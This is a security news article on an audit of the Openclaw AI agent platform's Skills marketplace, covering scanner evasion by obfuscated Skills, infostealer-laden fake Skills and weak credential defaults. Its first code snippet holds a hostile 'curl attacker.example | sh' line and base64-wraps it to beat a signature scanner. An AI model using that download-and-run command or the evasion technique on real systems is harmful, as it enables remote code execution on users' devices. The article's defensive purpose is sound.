Openclaw AI Under Threat from Malicious Skills Exploits
Researchers from Certik have uncovered serious security vulnerabilities in the Openclaw AI platform, specifically in its third-party “Skills” marketplace, that could be leveraged for malicious exploits. The finding underscores the urgent need for stronger security measures to protect users from attacks that could lead to data theft or unauthorized actions.
The security audit conducted by Certik focused on Openclaw’s ClawHub marketplace and its skill-scanning system. In a proof-of-concept attack, analysts demonstrated how a seemingly legitimate Skill could circumvent the platform’s three-layer evaluation process, which combines VirusTotal scanning, static code analysis, and AI logic assessment. The exploit used code obfuscation to achieve high-privilege code execution on user devices without triggering any alerts during the scans. Such vulnerabilities reflect an industry-wide overestimation of static pre-listing reviews, which are inadequate without stringent runtime isolation and granular controls that restrict what each Skill is permitted to do.
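To illustrate the evasion principle, the following sketch contrasts a toy signature scanner with a base64-wrapped payload. The scanner, its signature list, and the payload strings are all hypothetical stand-ins for the static review stage described above, not Certik's actual tooling; the obfuscated code is built as a string and never executed.

```python
import base64

# Naive signature-based scanner: flags source that contains known-bad
# strings verbatim (a stand-in for a static pre-listing review).
SIGNATURES = ["os.system", "rm -rf", "curl "]

def static_scan(source: str) -> bool:
    """Return True if any known-bad signature appears in the source text."""
    return any(sig in source for sig in SIGNATURES)

# A plainly malicious skill body (inert text, never run): the scanner catches it.
plain = 'import os\nos.system("curl attacker.example | sh")'

# The same body, base64-wrapped so no signature appears until runtime.
# The chosen signatures contain characters ('.', '-', ' ') that cannot
# occur in base64 output, so the wrapped form matches nothing.
obfuscated = (
    "import base64\n"
    "exec(base64.b64decode(%r).decode())" % base64.b64encode(plain.encode())
)

assert static_scan(plain) is True        # direct payload is flagged
assert static_scan(obfuscated) is False  # wrapped payload slips through
```

Real scanners are far more sophisticated, but the asymmetry is the same: any check that inspects code before it runs can be defeated by deferring payload assembly to runtime, which is why runtime isolation matters.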
Escalating Threats from Malicious Skills
The threat landscape appears increasingly dire for Openclaw: reports indicate that over 230 fraudulent Skills masquerading as legitimate applications, such as crypto trading tools and social media management solutions, currently exist across ClawHub and GitHub. Many of these counterfeit Skills harbor infostealer malware, including variants such as AMOS, RedLine, Lumma, and Vidar, and deploying them remains alarmingly simple because upload access is open to all users.
In addition, vulnerabilities such as CVE-2026-25253 have previously allowed token theft, leading to gateway compromises via malicious links. While timely patches were issued for such issues, default configurations remain plagued by inadequate data protection, including plaintext storage of API keys and passwords and susceptibility to injection attacks. As noted by China’s Computer Emergency Response Team (CERT), these weak default settings, combined with user error, exacerbate the potential for data breaches. The team advocated container isolation, restricting public ports, and tightening authentication processes.
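As a rough illustration of the plaintext-credential problem, the sketch below flags config entries that look like stored secrets and sources them from the environment instead. The config keys, values, and helper names here are hypothetical, not Openclaw's actual configuration format.

```python
import os
import re

# Hypothetical on-disk config with secrets stored in plaintext.
insecure_config = {
    "gateway_url": "https://gateway.example",
    "api_key": "sk-live-abc123",   # plaintext credential
    "password": "hunter2",         # plaintext credential
}

SECRET_KEYS = re.compile(r"api_key|password|token|secret", re.IGNORECASE)

def find_plaintext_secrets(config: dict) -> list:
    """Return config keys that appear to hold plaintext credentials."""
    return [k for k, v in config.items()
            if SECRET_KEYS.search(k) and isinstance(v, str) and v]

def load_secret(name: str) -> str:
    """One mitigation: require the environment, refuse plaintext fallback."""
    value = os.environ.get(name)
    if value is None:
        raise RuntimeError(f"{name} not set; refusing plaintext fallback")
    return value

assert find_plaintext_secrets(insecure_config) == ["api_key", "password"]
```

Environment variables are only a partial fix (they are still readable by co-resident processes), but they keep credentials out of files that an injected or malicious Skill can trivially read.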
Recommendations for Improved Security
Analysts emphasize that the vulnerabilities identified in Openclaw are not unique to this platform; they challenge the entire category of AI agent frameworks that rely on pre-listing checks. While Openclaw has acted quickly to patch certain weaknesses and enhance its scanning capabilities, stakeholders argue that ongoing vigilance and stronger runtime protections are essential to safeguarding users. As adoption of such AI platforms grows, including Tencent’s “Work Buddy,” security protocols must keep pace with increased scrutiny and usage.
To improve operational security, experts recommend that users isolate Openclaw operations within non-production virtual machines, use throwaway credentials, and limit the installation of third-party plugins. These proactive measures can reduce exposure to potential exploits and bolster user protection.
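The credential-isolation advice can be sketched in miniature: run untrusted code in a child process whose environment has been scrubbed of anything credential-shaped. The variable names and markers below are illustrative assumptions; a real deployment would add a VM or container boundary on top of this.

```python
import os
import subprocess
import sys

# Markers that suggest an environment variable holds a credential.
SENSITIVE = ("API_KEY", "TOKEN", "PASSWORD", "SECRET")

def scrubbed_env() -> dict:
    """Copy the environment, dropping anything that looks like a credential."""
    return {k: v for k, v in os.environ.items()
            if not any(marker in k.upper() for marker in SENSITIVE)}

def run_untrusted(code: str) -> str:
    """Execute code in a separate interpreter with no inherited secrets."""
    result = subprocess.run(
        [sys.executable, "-c", code],
        env=scrubbed_env(), capture_output=True, text=True, timeout=10,
    )
    return result.stdout

# The child cannot see a credential the parent holds.
os.environ["OPENCLAW_API_KEY"] = "sk-throwaway"
out = run_untrusted("import os; print('OPENCLAW_API_KEY' in os.environ)")
assert out.strip() == "False"
```

Pairing this with throwaway credentials means that even if a malicious Skill does exfiltrate something, the blast radius is a disposable key rather than a production secret.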